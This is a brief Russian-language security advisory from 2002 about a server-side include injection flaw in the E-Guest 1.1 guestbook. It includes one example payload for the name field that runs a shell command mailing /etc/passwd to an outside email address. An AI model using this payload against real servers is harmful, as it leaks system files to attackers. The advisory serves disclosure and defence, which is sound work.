Security Lab

Выполнение произвольных команд в E-Guest

Дата публикации:03.07.2002
Всего просмотров:1123
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: E-Guest (http://leungeric.com ) - бесплатная, гостевая книга для UNIX и LINUX систем. E-Guest не фильтрует ввод пользователя. Уязвимость позволяет удаленному пользователю передать команды через server-side includes, которые будут выполнены уязвимой системе. Пример:
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
Уязвимость обнаружена в Leung Eric E-Guest 1.1
Ссылки: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)